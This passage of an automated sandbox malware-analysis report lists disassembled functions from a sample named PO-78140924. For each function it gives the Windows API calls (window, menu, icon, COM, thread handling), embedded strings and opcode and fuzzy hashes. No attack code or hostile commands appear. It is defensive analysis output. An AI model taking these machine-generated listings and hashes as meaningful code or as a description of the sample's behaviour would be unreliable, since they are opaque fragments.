                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: d8914a92779e136ccc4d46b007d2b3053400e6b2c9e164fc27c670f1dda28abe
                                                • Instruction ID: 267b19a771f3156669d4ce965d6627f4772c1375ed67bcace0c48ff3370f6f98
                                                • Opcode Fuzzy Hash: d8914a92779e136ccc4d46b007d2b3053400e6b2c9e164fc27c670f1dda28abe
                                                • Instruction Fuzzy Hash: 0F414F35A04219EFDB10DFA4D8489EEBBB9FF48314F008069F955E7261DB35A945CFA0
                                                Function 0001FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0001FC06
                                                • OleUninitialize.OLE32(?,00000000), ref: 0001FCA5
                                                • UnregisterHotKey.USER32(?), ref: 0001FDFC
                                                • DestroyWindow.USER32(?), ref: 0005492F
                                                • FreeLibrary.KERNEL32(?), ref: 00054994
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000549C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 469580280-3243417748
                                                • Opcode ID: 88f495c4b27b3b26405d904c90668dcea5e9d32bcc2fcf4f5a0a7250283dbcc4
                                                • Instruction ID: 2e364fd99d6c1ef4fd15b0119c79030963555f00f2365a40eb5f70898985fedc
                                                • Opcode Fuzzy Hash: 88f495c4b27b3b26405d904c90668dcea5e9d32bcc2fcf4f5a0a7250283dbcc4
                                                • Instruction Fuzzy Hash: 9FA1A330701212CFCB69EF10C595AFAF3A4BF04705F5442ADE80AAB252DB30AD96CF91
                                                Function 00012E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowLongW.USER32(?,000000EB), ref: 00012EAE
                                                  • Part of subcall function 00011DB3: GetClientRect.USER32(?,?), ref: 00011DDC
                                                  • Part of subcall function 00011DB3: GetWindowRect.USER32(?,?), ref: 00011E1D
                                                  • Part of subcall function 00011DB3: ScreenToClient.USER32(?,?), ref: 00011E45
                                                • GetDC.USER32 ref: 0004CEB2
                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0004CEC5
                                                • SelectObject.GDI32(00000000,00000000), ref: 0004CED3
                                                • SelectObject.GDI32(00000000,00000000), ref: 0004CEE8
                                                • ReleaseDC.USER32(?,00000000), ref: 0004CEF0
                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0004CF7B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                • String ID: U
                                                • API String ID: 4009187628-3372436214
                                                • Opcode ID: 73d2a25046b05013d3480cad528a0985e571075486e2f85f154c01f9a3743562
                                                • Instruction ID: 3d40a1a24db0a4a5077da756d104536aa29b1593cd01baf851bc1c5704b7ed2f
                                                • Opcode Fuzzy Hash: 73d2a25046b05013d3480cad528a0985e571075486e2f85f154c01f9a3743562
                                                • Instruction Fuzzy Hash: 8A71BD70501205DFEFA18F64C880AFA7BF6FF48320F14427AED559A2A6C7358895DB60
                                                Function 00019997 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 146COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __i64tow__itow
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 1776342733-2263619337
                                                • Opcode ID: 2cb762c6ff91af797471a3103906975d63ae36781c5521efa26d2b4eaae727b7
                                                • Instruction ID: d67e3e3eec1b47e21646e446881d2c839d8ec2f5b384145d7c68697305eb34b7
                                                • Opcode Fuzzy Hash: 2cb762c6ff91af797471a3103906975d63ae36781c5521efa26d2b4eaae727b7
                                                • Instruction Fuzzy Hash: EA41B671604206AFDB74DB38DC52EBA77E8EF44310F2044BEE549DB292EE719D828711
                                                Function 00072502 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 138windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 00072550
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0007259B
                                                • IsMenu.USER32(00000000), ref: 000725BB
                                                • CreatePopupMenu.USER32 ref: 000725EF
                                                • GetMenuItemCount.USER32(000000FF), ref: 0007264D
                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0007267E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                • String ID: 0$2
                                                • API String ID: 3311875123-3793063076
                                                • Opcode ID: 188690e2fa2bcc5bb148213305d7e5851152f8ea7ad99f775719f67ccf1b3d45
                                                • Instruction ID: 96d689dc8565753075a56ff3d2977171f8d903d3f0db8076286e790813dd8c1e
                                                • Opcode Fuzzy Hash: 188690e2fa2bcc5bb148213305d7e5851152f8ea7ad99f775719f67ccf1b3d45
                                                • Instruction Fuzzy Hash: BE51BE70E0024AEFDF20CF68D888AADBBF5FF04318F14816EE85997291E7789944CB55
                                                Function 00049EB9 Relevance: 13.9, APIs: 9, Instructions: 391COMMON
                                                Download Yara Rule
                                                APIs
                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 00088EDA
                                                  • Part of subcall function 000891F5: LoadLibraryA.KERNEL32(kernel32.dll,?,00088E09), ref: 00089203
                                                  • Part of subcall function 000891F5: GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00089215
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?), ref: 00088E3D
                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000), ref: 00088E71
                                                • SysFreeString.OLEAUT32(00000000), ref: 00088F85
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00088FEB
                                                • SysFreeString.OLEAUT32(?), ref: 00089015
                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 00089165
                                                • ProgIDFromCLSID.COMBASE(?,?), ref: 000891AF
                                                • CoTaskMemFree.COMBASE(?), ref: 000891CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FreeString$From$Library$AddressFileLoadModuleNamePathProcProgQueryTaskType
                                                • String ID:
                                                • API String ID: 1458262341-0
                                                • Opcode ID: 2911f69d9281f0b937d75c17808bdac219b3f0f5a2087531c4ca7525f789c3e6
                                                • Instruction ID: 4bbf1eb9a5e2a8b953768c49d3433bcbee75bddad067de65eb72d2e3a85c3f12
                                                • Opcode Fuzzy Hash: 2911f69d9281f0b937d75c17808bdac219b3f0f5a2087531c4ca7525f789c3e6
                                                • Instruction Fuzzy Hash: FFE12771A00109AFDF54EF94C888EAEB7B9FF49314F148099F945AB251DB31AE45CB50
                                                Function 0001201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00011B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00012036,?,00000000,?,?,?,?,000116CB,00000000,?), ref: 00011B9A
                                                • DestroyWindow.USER32(?), ref: 000120D3
                                                • KillTimer.USER32(-00000001,?,?,?,?,000116CB,00000000,?), ref: 0001216E
                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0004BE26
                                                • DeleteObject.GDI32(00000000), ref: 0004BE9C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 2402799130-0
                                                • Opcode ID: 7a798ed2bab43c833e3dad87ceaf3853a4c2738273876718344e384403209a60
                                                • Instruction ID: cbe438965c1a8c6d7c367d84e55da71c816e6b105c9654167e5e4ac9c6f062e7
                                                • Opcode Fuzzy Hash: 7a798ed2bab43c833e3dad87ceaf3853a4c2738273876718344e384403209a60
                                                • Instruction Fuzzy Hash: F6618B30101B01DFEB36DF15DD48BA9B7F1FB94312F10852AEA4297961C779A8A1EB50
                                                Function 00098677 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00098731
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: 9304d8eaeb28b86d3a017cef806e7b31a90073c930d3f321401a9079c4c878ae
                                                • Instruction ID: 4fb91a5e2db3ead785fb908b252336106325b8750ca7e36c99c04fbcb0f17758
                                                • Opcode Fuzzy Hash: 9304d8eaeb28b86d3a017cef806e7b31a90073c930d3f321401a9079c4c878ae
                                                • Instruction Fuzzy Hash: E0517470504204BAEF209B65CC85BAD7BA4EB07350F608516FA15EA3E1CF75E990EB61
                                                Function 00012B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0004C477
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0004C499
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0004C4B1
                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0004C4CF
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0004C4F0
                                                • DestroyCursor.USER32(00000000), ref: 0004C4FF
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0004C51C
                                                • DestroyCursor.USER32(?), ref: 0004C52B
                                                  • Part of subcall function 0009A4E1: DeleteObject.GDI32(00000000), ref: 0009A51A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                                • String ID:
                                                • API String ID: 2975913752-0
                                                • Opcode ID: 324697282c1494b5066f51f2424bb76e2fa1b76a3a624343ac5bfda4d540cccd
                                                • Instruction ID: 1ef97605083e9744fcc7ea8a5e9a120d0cfb4447bbbacb5def08c2d8facf6348
                                                • Opcode Fuzzy Hash: 324697282c1494b5066f51f2424bb76e2fa1b76a3a624343ac5bfda4d540cccd
                                                • Instruction Fuzzy Hash: E05167B4600609EFEB64DF24DC85FAE77E5EB58311F104529F902E72A0DB74ADA0DB60
                                                Function 00089228 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$_memset
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2862541840-625585964
                                                • Opcode ID: 2c8c9b0fae0519a41af3f74d130108239159dd231b2c709553cc30652c297afd
                                                • Instruction ID: 2ba0b34257c8f4848352bce897fc7347410965b21ae28b5f44ef40ff2ad60847
                                                • Opcode Fuzzy Hash: 2c8c9b0fae0519a41af3f74d130108239159dd231b2c709553cc30652c297afd
                                                • Instruction Fuzzy Hash: 9891AD70A00219ABDF24FFA4C844FAEBBB8FF85710F148569F549AB281D7709945CBA0
                                                Function 0007302E Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadIconW.USER32(00000000,00007F03), ref: 000730CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: cd2062c3cc21818539a20dd23174b9cf69437d8d57665949166347592742dfce
                                                • Instruction ID: 524cb2ec63807303a644dc6ad757d95e7cd13b4a327c14829363a8e66331db18
                                                • Opcode Fuzzy Hash: cd2062c3cc21818539a20dd23174b9cf69437d8d57665949166347592742dfce
                                                • Instruction Fuzzy Hash: DE11EB35A08707BAF7355B54DCA2DEF77DC9F05320F10802AF60896182DAB96F4057E9
                                                Function 00074339 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100), ref: 00074353
                                                • LoadStringW.USER32(00000000), ref: 0007435A
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00074370
                                                • LoadStringW.USER32(00000000), ref: 00074377
                                                • _wprintf.LIBCMT ref: 0007439D
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000743BB
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 00074398
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: baaeb7ce3f5eb606658b21cac77ea20475c47525b67dd4beb9a7312168ce4ca9
                                                • Instruction ID: d89f8243a7fa3904c5d6e51fd0904c21fa23adbc4db2abae1acd17d90bc91678
                                                • Opcode Fuzzy Hash: baaeb7ce3f5eb606658b21cac77ea20475c47525b67dd4beb9a7312168ce4ca9
                                                • Instruction Fuzzy Hash: F80162F3904209BFE7519BA0DD89EFA776CE708301F0045A6B749E2051EA789E854B74
                                                Function 000772D9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 33synchronizationthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 000772EC
                                                • RtlEnterCriticalSection.NTDLL(?), ref: 000772FD
                                                • TerminateThread.KERNEL32(?,000001F6,?,0004D273), ref: 0007730A
                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,0004D273), ref: 00077317
                                                  • Part of subcall function 00076CDE: CloseHandle.KERNEL32(?,?,00077324,?,0004D273), ref: 00076CE8
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0007732A
                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00077331
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID: %
                                                • API String ID: 3495660284-3960974693
                                                • Opcode ID: 76ada328c5a9f7cc6f8ed262365173b79c20647a2ae6423998b217541c99526d
                                                • Instruction ID: aebce293ace05a406b6a63e6c1e4ebf1ac1cdc22654ced290096146275a8c37e
                                                • Opcode Fuzzy Hash: 76ada328c5a9f7cc6f8ed262365173b79c20647a2ae6423998b217541c99526d
                                                • Instruction Fuzzy Hash: E3F05E36540613EBF7122B64ED8CAEA776AFF49302B100533F506D10A0CB7A6911CBA0
                                                Function 00012A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0004C347,00000004,00000000,00000000,00000000), ref: 00012ACF
                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0004C347,00000004,00000000,00000000,00000000,000000FF), ref: 00012B17
                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0004C347,00000004,00000000,00000000,00000000), ref: 0004C39A
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0004C347,00000004,00000000,00000000,00000000), ref: 0004C406
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: aa701ee1be9166f2dd9bd01e9b436dda86f2cd4f781ddc984e3983f2bc5c3f30
                                                • Instruction ID: be2450a72ef5c2fdd501cb619cad114c1f03757c7383320ce9cb5b6e6003fb54
                                                • Opcode Fuzzy Hash: aa701ee1be9166f2dd9bd01e9b436dda86f2cd4f781ddc984e3983f2bc5c3f30
                                                • Instruction Fuzzy Hash: DC4108702097809BE7B98F289CC8BFF7BD5BF45301F95882EE04786561C675A8E1D722
                                                Function 00096205 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 0009621D
                                                • GetDC.USER32(00000000), ref: 00096225
